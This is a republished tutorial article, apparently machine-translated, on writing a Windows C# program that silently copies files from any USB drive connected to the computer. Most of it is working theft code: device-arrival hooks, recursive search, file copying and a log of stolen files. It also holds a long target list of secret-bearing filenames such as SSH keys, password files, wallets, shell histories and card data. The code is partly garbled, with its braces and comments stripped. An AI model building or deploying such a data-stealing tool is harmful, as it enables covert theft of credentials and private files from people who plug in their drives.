Geekly Articles each Day
📜 ⬆️ ⬇️

Writing a program to steal data from a USB-drive in Windows

Task:
Write software unauthorized copying files from a legally connected USB device that does not require installation or administrator rights.
Those. legal software that can be used by attackers to harm (according to the interpretation of one of the antivirus tools).
Algorithm of the program
Lecture hall:
Beginners in programming and just interested.

An example of software application by an attacker:

We write the program:
1. We catch the connection of the USB device
Overriding the WndProc Method
protected override void WndProc(ref Message m)//  : base.WndProc(ref m); const int WM_DeviceChange = 0x219; //-   usb const int DBT_DEVICEARRIVAL = 0x8000; //  const int DBT_DEVICEREMOVECOMPLETE = 0x8004; //   if (m.Msg == WM_DeviceChange) Thread T = new Thread(_); if (m.WParam.ToInt32() == DBT_DEVICEARRIVAL) T.Start();// usb  if (m.WParam.ToInt32() == DBT_DEVICEREMOVECOMPLETE) T.Abort();// usb


2. Choose file formats to search for (in an individual sequence - because everyone decides for himself what type of files to copy first)
File types recorded, for example, in (listBox2):
*.ppk
*.pref
*.remmina
*.sh
*.txt
*.ml*
*access*.txt
*account*
*accs*.txt
*admin*.txt
*amazon*.txt
*authorized_keys*
*balance*.txt
*bash_history*
*billing*.txt
*btc*.txt*brute*
*c6ep*.txt
*cepep*
*codes*
*connect*
*contacts*.txt
*database*
*dedic*.txt
*dedik*.txt
*domain*.txt
*ftp*.txt
*hack*.txt
*host*.txt
*icq*.txt
*id_*sa*
*id_dsa*
*id_rsa*
*known_hosts*
*ksh_history*
*login*
*mail*.txt
*merchant*.txt
*money*
*myadmin*.txt
*mysql_history*
*nano_history*
*parol*
*pass*
*pentest*
*pgsql_history*
*pma*.txt
*pref*
*qwerty*
*rdp*.txt
*remmina*
*root*
*serv*.txt
*sh_history*
*srv*.txt
*todo*.txt
*userid*
*users*
*vds*.txt
*vpn*.txt
*vps*.txt
*vuln*.txt
*wallet*
*webmon*
*zsh_history*
**.txt
**
**
**
**.txt
**.txt
**
**.txt
**.txt
**
**.txt
**
**.txt
**.txt
**
**
**
**
**.txt
**.txt
**.txt
**.txt
**.txt
**
**.txt
**
**.txt
**
**
**
**.txt
**
**.txt
**
**.txt
**.txt
**.txt
**.txt
**.txt
**.txt
**
**.txt
**.txt
**.txt
**.txt
**
**
access.txt
adm.txt
all.txt
bill.txt
card.txt
cards.txt
cc.txt
centos.txt
data.txt
ded.txt
ftps.txt
full.txt
hdd.txt
host.txt
id.txt
info.txt
key.txt
linux.txt
mail.txt
mails.txt
pern*.txt
skype*.txt
sql*.txt
ssh*.txt
sys.txt
tconn.conf
toor.txt
ubuntu.txt
usb.txt
user.txt
virtual.txt
*.txt
*.txt
*.txt
**
*pass*
*pwd*
*login*
**
*vk.com*

**
*.xls*
*.doc*
*.rtf
*.JPG
*.jpeg
*.pgf
*.bmp
*.cr2
*config*
**
**


3. We are looking for files on a USB-drive.
Search function:
 private ArrayList F;//    private void _() Thread.Sleep(4000);//         foreach (var dInfo in DriveInfo.GetDrives()) if (dInfo.IsReady && dInfo.DriveType == DriveType.Removable) for (int i = 0; i < listBox2.Items.Count; i++) { foreach (string file in Directory.GetFiles(@dInfo.Name, listBox2.Items[i].ToString(), SearchOption.AllDirectories)) F.Add(new FILEclass(file, Path.GetFileName(file))); }


5. Copy files from a connected USB-drive to your computer
Copy function
 private void cheat() ... ... //    Directory.CreateDirectory("Liked " + DateTime.Now.Year + "." + DateTime.Now.Month + "." + DateTime.Now.Day); int copied = 0; int copy_err = 0; int exist = 0; for (int i = 0; i < F.Count; i++) { string sourceName = Path.GetFileName((((FILEclass)(F[i])).Fullname)); string source = ((FILEclass)(F[i])).Fullname; string dest = Dir + @"\" + ((FILEclass)(F[i])).name; string destName = Path.GetFileName(Dir + @"\" + ((FILEclass)(F[i])).name); if (sourceName.Equals(destName)) if (File.Exists(source)) if (File.Exists(dest)) try { if (FileCompare(source, dest)) exist++; //    else//  -   File.Copy(source, Dir + @"\" + Timenow() + "s. " + ((FILEclass)(F[i])).name); copied++; } catch{copy_err++; }//   USB-  else { try File.Copy(source, dest); catch { copy_err++; } copied++; } else copy_err++; }

The function of comparing two files
  //https://support.microsoft.com/ru-ru/kb/320348 private bool FileCompare(string file1, string file2) int file1byte; int file2byte; FileStream fs1; FileStream fs2; if (file1 == file2) return true;//        fs1 = new FileStream(file1, FileMode.Open); fs2 = new FileStream(file2, FileMode.Open); if (fs1.Length != fs2.Length) fs1.Close(); fs2.Close(); return false; do { //  ,      file1byte = fs1.ReadByte(); file2byte = fs2.ReadByte(); } while ((file1byte == file2byte) && (file1byte != -1)); fs1.Close(); fs2.Close(); return ((file1byte - file2byte) == 0);

6. Logging
By adding a log, you can easily see the approximate folder structure on a USB device and what is copied:

 14.08.2015 21:25:13 =============================================   14.08.2015 21:25:17    14.08.2015 21:25:18   F:\123hack.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\App1.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\LanguageQualifiers.txt 14.08.2015 21:25:18   F:\ \\App1\App1\obj\Debug\ProjectArchitectures.txt 14.08.2015 21:25:18   F:\ \\Cisco Mars incident parser\Cisco Mars incident parser\obj\Debug\Cisco Mars incident parser.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\dots\dots\obj\Debug\dots.csproj.FileListAbsolute.txt 14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Assets\AboutAssets.txt 14.08.2015 21:25:18   F:\ \\genovirus\genovirus\Resources\AboutResources.txt 14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug\ResourceTypeUsage.txt 14.08.2015 21:25:18   F:\ \\TheGenoVirus\TheGenoVirus\obj\Debug

7. Copying data from external HDDs will be left as “homework”

Findings:
Do not store sensitive information on removable USB devices and do not connect them to non-trusted devices.
')
Ready example in "Cloud@mail.ru"

www.virustotal.com : 1/56 (antivirus "VBA32" defines as "Trojan.MSIL.gen.11").

Source: https://habr.com/ru/post/264513/

More articles:


All Articles